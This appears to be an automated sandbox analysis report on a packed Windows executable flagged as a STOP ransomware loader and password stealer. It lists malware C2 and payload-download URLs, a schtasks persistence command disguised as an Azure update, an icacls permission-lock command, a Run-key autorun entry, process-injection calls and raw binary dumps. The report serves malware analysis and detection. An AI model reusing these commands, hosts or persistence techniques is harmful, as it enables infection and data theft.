Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 29, 2024, 7:46 a.m.	March 29, 2024, 8:07 a.m.

Size	758.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`b63eeaaf33df089b775363868daf45a7`
SHA256	`0a1e937d7c52a8be935a32e1f8385787724aed36aa1900e32055ffc92ef630e3`
CRC32	`08C337EF`
ssdeep	`12288:ZSCyEt/2qirq/+HT4FMIeNi8eu2huSwgDgCXZkMtx8nRs0q9/LN3pkWR4:ZhOEm/QRLhujMtGK9LPkWR4`
PDB Path	C:\wefog\se.pdb
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

buildz.exe "C:\Users\test22\AppData\Local\Temp\buildz.exe"
2544
- buildz.exe "C:\Users\test22\AppData\Local\Temp\buildz.exe"
  2596
  - icacls.exe icacls "C:\Users\test22\AppData\Local\8af848a7-33ae-45f8-8f88-48d3e6a644c8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    2748
  - buildz.exe "C:\Users\test22\AppData\Local\Temp\buildz.exe" --Admin IsNotAutoStart IsNotTask
    2804
    - buildz.exe "C:\Users\test22\AppData\Local\Temp\buildz.exe" --Admin IsNotAutoStart IsNotTask
      2884
      - build2.exe "C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build2.exe"
        3000
        
        build2.exe "C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build2.exe"
        3044
      - build3.exe "C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build3.exe"
        2108
        
        build3.exe "C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build3.exe"
        2252
        
        schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"
        2440

Name	Response	Post-Analysis Lookup
sajdfue.com	A 62.150.232.50 A 78.89.158.42 A 201.191.99.134 A 109.98.213.203 A 189.189.213.86 A 192.143.159.3 A 175.120.254.9 A 95.158.162.200 A 84.2.251.47 A 201.236.158.115	189.189.213.86
api.2ip.ua	A 104.21.65.24 A 172.67.139.220	104.21.65.24
sdfjhuz.com	A 190.159.30.53 A 109.98.213.203 A 183.100.39.16 A 190.187.52.42 A 95.86.30.3 A 211.168.53.110 A 186.188.192.165 A 211.119.84.111 A 84.2.251.47 A 181.55.190.201	211.168.53.110
t.me	A 149.154.167.99	149.154.167.99
steamcommunity.com	A 104.76.78.101	104.76.78.101

IP Address	Status	Action
104.76.78.101	Active	Moloch
149.154.167.99	Active	Moloch
164.124.101.2	Active	Moloch
172.67.139.220	Active	Moloch
192.143.159.3	Active	Moloch
211.168.53.110	Active	Moloch
78.46.229.36	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49178 -> 104.76.78.101:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2027026	ET POLICY External IP Address Lookup DNS Query (2ip .ua)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49163 -> 172.67.139.220:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 172.67.139.220:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:54148 -> 164.124.101.2:53	2027026	ET POLICY External IP Address Lookup DNS Query (2ip .ua)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49170 -> 172.67.139.220:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 172.67.139.220:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49183 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.101:49184 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.101:49183 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49184 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49183 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.101:49184 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 149.154.167.99:443 -> 192.168.56.101:49186	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 211.168.53.110:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 211.168.53.110:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 211.168.53.110:80	2036333	ET MALWARE Win32/Vodkagats Loader Requesting Payload	A Network Trojan was detected
TCP 211.168.53.110:80 -> 192.168.56.101:49172	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.101:49171 -> 192.143.159.3:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.101:49171 -> 192.143.159.3:80	2036334	ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key	A Network Trojan was detected
TCP 192.168.56.101:49173 -> 192.143.159.3:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.143.159.3:80 -> 192.168.56.101:49171	2036335	ET MALWARE Win32/Filecoder.STOP Variant Public Key Download	A Network Trojan was detected
TCP 192.168.56.101:49173 -> 192.143.159.3:80	2036333	ET MALWARE Win32/Vodkagats Loader Requesting Payload	A Network Trojan was detected
TCP 192.143.159.3:80 -> 192.168.56.101:49173	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 78.46.229.36:443 -> 192.168.56.101:49181	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49183 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.101:49184 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49178 104.76.78.101:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	10:20:2b:ee:30:69:cc:b6:ac:5e:47:04:71:ca:b0:75:78:51:58:f5
TLSv1 192.168.56.101:49163 172.67.139.220:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=2ip.ua	f8:9c:5f:b5:f0:79:90:56:07:a5:b3:43:29:6b:47:5e:bf:d2:dc:41
TLSv1 192.168.56.101:49170 172.67.139.220:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=2ip.ua	f8:9c:5f:b5:f0:79:90:56:07:a5:b3:43:29:6b:47:5e:bf:d2:dc:41

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 29, 2024, 7:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 29, 2024, 7:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 29, 2024, 7:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 29, 2024, 7:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 29, 2024, 7:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 29, 2024, 7:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 29, 2024, 7:46 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 29, 2024, 7:46 a.m.			0	0
IsDebuggerPresent March 29, 2024, 7:46 a.m.			0	0
IsDebuggerPresent March 29, 2024, 7:46 a.m.			0	0
IsDebuggerPresent March 29, 2024, 7:46 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW March 29, 2024, 7:46 a.m.	buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created. console_handle: 0x00000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

C:\wefog\se.pdb

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

SAYEXUDAPUVEXUSEMOZIDEJOP

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 29, 2024, 7:46 a.m.	stacktrace: build2+0x13505 @ 0x413505 build2+0x1527b @ 0x41527b build2+0x15729 @ 0x415729 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 43 08 03 47 08 c7 45 f0 01 00 00 00 89 46 08 exception.symbol: build2+0xe6ab exception.instruction: mov eax, dword ptr [ebx + 8] exception.module: build2.exe exception.exception_code: 0xc0000005 exception.offset: 59051 exception.address: 0x40e6ab registers.esp: 1615044 registers.edi: 1615444 registers.eax: 0 registers.ebp: 1615072 registers.edx: 1919805149 registers.ebx: 1 registers.esi: 1615432 registers.ecx: 1615444	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://steamcommunity.com/profiles/76561199658817715

Performs some HTTP requests (5 events)

request	GET http://sajdfue.com/test1/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true
request	GET http://sdfjhuz.com/dl/build2.exe
request	GET http://sajdfue.com/files/1/build3.exe
request	GET https://api.2ip.ua/geo.json
request	GET https://steamcommunity.com/profiles/76561199658817715

Allocates read-write-execute memory (usually to unpack itself) (9 events)

Time & API	Arguments	Status
NtProtectVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 598016 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02340000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2544 region_size: 1159168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2804 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 598016 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b70000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2804 region_size: 1159168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d62000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 3000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 114688 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009ce000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 3000 region_size: 200704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00340000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2108 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 65536 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bec000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2108 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00330000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build3.exe
file	C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build2.exe

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build2.exe
file	C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build3.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build2.exe
file	C:\Users\test22\AppData\Local\576b6e31-0b12-4463-89ad-552ace5cbcf9\build3.exe

Executes one or more WMI queries (1 event)

wmi

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW March 29, 2024, 7:46 a.m.	thread_identifier: 2456 thread_handle: 0x000000ac process_identifier: 2440 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1	0

An executable file was downloaded by the process buildz.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile March 29, 2024, 7:46 a.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $Bä\#[\#[\#[3U[D#[3U [(#[3U![{#[U[[W#[\#[7#[3U%[]#[3U[]#[3U[]#[Rich\#[PELÉð²cà ô±@ '¤\xÀ¶ÙàS@.text¨òô `.rdataÞUVø@@.dataäBp,N@À.rsrc¶ÙÀÚz@@Ç0AéIÌÌÌÌÌVñÇ0Aè6öD$t VèÄÆ^ÂÌÌÌÌÌÌÌÌÌÌÌÌ~rPèñÄ3ÉÇFÇFfÃÌÌÌÌÌÌÌÌÌÌÌSUl$ÙVs;õs hTQCè£+õ;Æsð;ûu.Èÿ÷è]Å3ÉèT^]Ç[ÂÇèÅÀtM¸9CrëË9GrëÇ6SiQPè8pÄwr^3Òf]Ç[ÂÇ3Òf^]Ç[ÂÌÌÌÌÌÌÌÌÌÌÌÌWøGørëÏùQCw9ørëÏWQùQCv ørëÇºQC+ÐÑúRÆÏèÿÿÿ_Ãþþÿÿv hlQCè\;ÆsGPVWè=öt^r$ë"öuòwør3ÉfÇ_ÃÇ3Éf_ÃÇS6ShQCPèMoÄwr 3Òf[Ç_ÃÇ3Òf[Ç_ÃÌÌÌÌÌÌÌWøF;Ás hTQCè+Á;ÇsøÿtUVSúrëÞúrëÖ+ÇÀP9CPJQèaFÄ+Ç~F[r3ÒfAÆ_ÃÎ3ÒfAÆ_ÃÌÌÌÌÌÌÌþþÿÿv hlQCèNH;ÎsHQVPè,3À;ÆÀ÷ØÃöupùr3Òf3À;ÆÀ÷ØÃÌÌÌÌÌÌÌUìjÿh Ad¡PìSVW¡\|pC3ÅPEôd£eðE}ðÎþþÿÿvðë'_¸«ªªª÷æËÑéÑê;Êv¸þÿÿ+Á4;Øv¾þÿÿ3ÀNEü;ÈvùÿÿÿwÉQèF ÄÀtØëOUìRMàÇEìèhZCEàPÇEà0Aè3EHeðEÆEüè£Eì¸¦@Ã}u]ìMÉtrëÇÉQPSèTmMÄrRè_MÄwOþrû3ÒfOMôd Y_^[å]Âu~rPèÄ3ÉQÇFÇFQfè~ ÌÌÌì3ÀÉtDùÿÿÿw PèAÄÀu,$QL$ÇD$èhZCT$RÇD$0Aè. ÄÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌD$VPñèÙÇ0AÆ^ÂééÿUìVÿuñè³ÇäAÆ^]ÂÿUììEEEPMôèþh¬VCEôPÇEôðAè¬ ÌÿUìVÿuñèfÇðAÆ^]ÂÿUììEEEPMôè±hèVCEôPÇEôüAè_ ÌÿUìVÿuñèÇüAÆ^]ÂÿUìVñèÍöEtVè¬YÆ^]ÂÿUìVñè¬öEtVèYÆ^]ÂÿUìVñèöEtVèjYÆ^]Â; \|pCuóÃé ÿUìì SW3Ûj3ÀY}ä]àó«9]uèÇè»ÈÿëME;ÃtäVEèEàEPSÿuEàPÇEäÿÿÿÇEìBèSÄÿMäðxEàëEàPSè¦ YYÆ^_[ÉÃÿUìÁMÇA HÆ@]ÂAÀu¸AÃÿUì}Wùt-VÿuèpVèWYYGÀtÿuVPè£ÄÆG^_]ÂÿVñ~t ÿvènYfÆF^ÃÿUìEVñfÇAÆFÿ0èÿÿÿÆ^]ÂÿUìVuWù;þtè¦ÿÿÿ~tÿvÏèVÿÿÿëFGÇ_^]ÂÇAé{ÿÿÿÿUìVñÇAèhÿÿÿöEtVèÁYÆ^]ÂÿUìVÿuñfÇAÆFè{ÿÿÿÆ^]ÂÌÌÌÌÌUìWVuM}ÁÑÆ;þv;ø ùr=Ø¢StWVçæ;þ^_ué¡÷ÇuÁéâùr)ó¥ÿ$ @ÇºéràÈÿ$4@ÿ$0@ÿ$´@D@p@@#ÑFGFÁéGÆÇùrÌó¥ÿ$ @I#ÑFÁéGÆÇùr¦ó¥ÿ$ @#ÑÆÁéÇùró¥ÿ$ @I@@ü@ô@ì@ä@Ü@Ô@DäDäDèDèDìDìDðDðDôDôDøDøDüDüðøÿ$ @ÿ0@8@D@X@E^_ÉÃE^_ÉÃFGE^_ÉÃIFGFGE^_ÉÃt1ü\|9ü÷Çu$Áéâùr ýó¥üÿ$¼@ÿ÷Ùÿ$l@IÇºùrà+Èÿ$À@ÿ$¼@Ð@ô@@F#ÑGîÁéïùr²ýó¥üÿ$¼@IF#ÑGFÁéGîïùrýó¥üÿ$¼@F#ÑGFGFÁéGîïùVÿÿÿýó¥üÿ$¼@Ip@x@@@@@ @³@DDDDDDDDDDDDDDðøÿ$¼@ÿÌ@Ô@ä@ø@E^_ÉÃFGE^_ÉÃIFGFGE^_ÉÃFGFGFGE^_ÉÃÿUìS]ûàwoVW=Cuè9jèhÿèYYÛtÃë3À@Pjÿ5Cÿ¬Aøÿu&j^9Ct Sè[YÀu©ëè¨0è¡0Ç_^ëSè:YèÇ3À[]Ãjh(WCèÿ3À3ö9uÀ;ÆuècÇèÈÿë8èPVè.YYuüÿuÿuÿuèPÿUÄEäÇEü request_handle: 0x00cc000c	1	1	0
InternetReadFile March 29, 2024, 7:46 a.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $6økrh8rh8rh8ÏÖþ8sh8lËý8nh8lËë8üh8U_8{h8ri8Éh8lËì82h8lËü8sh8lËù8sh8Richrh8PELÒ¹aà j; @À>°¿lhd>/0¸@¸.textrhj `.data¨ÿ:n@À.kic>\|@À.rsrc/>0~@@¶sssökl"l.lHlZlplll¬lÀlÐlìlþlm m4mBm^mtmm m°mÊmÜmömnn&n@n\nlnnn n¬n¼nÔnænönoo,o@oTo`opoooêkÂoØoêopp.p:pHpVpnppp¦p´pÎpÜpüpq,q@qPqbq~qq¨q¶qÎqÜqêq r"r2r>rPrbrxrrªr¾rÚrärss s4sLsÒk¦k´k¦okÜsäsüst&t:tNtjttt²t¾tÊtÜtìtüt uu$u:uDuRubunuuuªu¸uÊuÜuöuvv6vLvfv~vv®vÈvÖvävðvww&w2w>wNwXwdwpwwªwÀwÐwæwöwxxx<xHxVxdxnsp:C AÀA`A4B`TB@ÞA@;B@Cp ATcX¸¬bad allocationlubimipemoxiluyexuwilusimazovahoyipixefuliguhifedejowibifunepageyuveciwicabutecohopecadedohomosiseroxagogukisegopezehuyorosecexeyunolezamugocimidezoyobugalodolobuvelelezocokakufofafacajoxecesuvusunixanofuloxucepofalimetominibidoluzogudawulapabevotuwSolofudi goxoruv sapocuziNimigot gifovuwelxolatxojiliFapejepuzeh wororuv mezumitelaMawoyujewoyosigubufozo wami xuxolesenawemo dohamefejexeyukuore lacohocojalikukkurikolisidudiguyikawu danijekernel32.dllì¸@§»@Ðç@ITERATOR LIST CORRUPTED!C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\xutility"out of range"("_Myptr + _Off <= ((_Myvec )(this->_Getmycont()))->_Mylast && _Myptr + _Off >= ((_Myvec )(this->_Getmycont()))->_Myfirst", 0)"invalid argument"std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator +=("this->_Has_container()", 0)C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vectorstd::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::alloca request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000a0800', u'virtual_address': u'0x00017000', u'entropy': 7.679278263945651, u'name': u'.data', u'virtual_size': u'0x00746e60'}

entropy

7.67927826395

description

A section with a high entropy has been found

entropy

0.847524752475

description

Overall entropy of this PE file is high

Potentially malicious URLs were found in the process memory dump (3 events)

url	http://www.openssl.org/support/faq.html
url	https://steamcommunity.com/profiles/76561199658817715
url	https://t.me/sa9ok

Yara rule detected in process memory (50 out of 66 events)

description	task schedule	rule	schtasks_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	[m] Generic Malware	rule	Generic_Malware_Zero_m
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications use DNS	rule	Network_DNS
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications use DNS	rule	Network_DNS
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"

Communicates with host for which no DNS query was performed (1 event)

host

78.46.229.36

Allocates execute permission to another process indicative of possible code injection (4 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2596 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1
NtAllocateVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2884 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1
NtAllocateVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 3044 region_size: 2375680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000a8	1
NtAllocateVirtualMemory March 29, 2024, 7:46 a.m.	process_identifier: 2252 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper

reg_value

"C:\Users\test22\AppData\Local\8af848a7-33ae-45f8-8f88-48d3e6a644c8\buildz.exe" --AutoStart

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory March 29, 2024, 7:46 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2596 process_handle: 0x00000080	1	1
WriteProcessMemory March 29, 2024, 7:46 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2884 process_handle: 0x00000080	1	1
WriteProcessMemory March 29, 2024, 7:46 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3044 process_handle: 0x000000a8	1	1
WriteProcessMemory March 29, 2024, 7:46 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2252 process_handle: 0x00000080	1	1

Network activity contains more than one unique useragent (3 events)

process	buildz.exe	useragent	Microsoft Internet Explorer
process	build2.exe	useragent
process	build2.exe	useragent	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2544 called NtSetContextThread to modify thread in remote process 2596
Process injection	Process 2804 called NtSetContextThread to modify thread in remote process 2884
Process injection	Process 3000 called NtSetContextThread to modify thread in remote process 3044
Process injection	Process 2108 called NtSetContextThread to modify thread in remote process 2252
NtSetContextThread March 29, 2024, 7:46 a.m.	registers.eip: 1995571652 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2596	1	0	0
NtSetContextThread March 29, 2024, 7:46 a.m.	registers.eip: 1995571652 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2884	1	0	0
NtSetContextThread March 29, 2024, 7:46 a.m.	registers.eip: 1995571652 registers.esp: 1638384 registers.edi: 0 registers.eax: 4281957 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000a4 process_identifier: 3044	1	0	0
NtSetContextThread March 29, 2024, 7:46 a.m.	registers.eip: 1995571652 registers.esp: 1638384 registers.edi: 0 registers.eax: 4201210 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2252	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (10 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2544 resumed a thread in remote process 2596
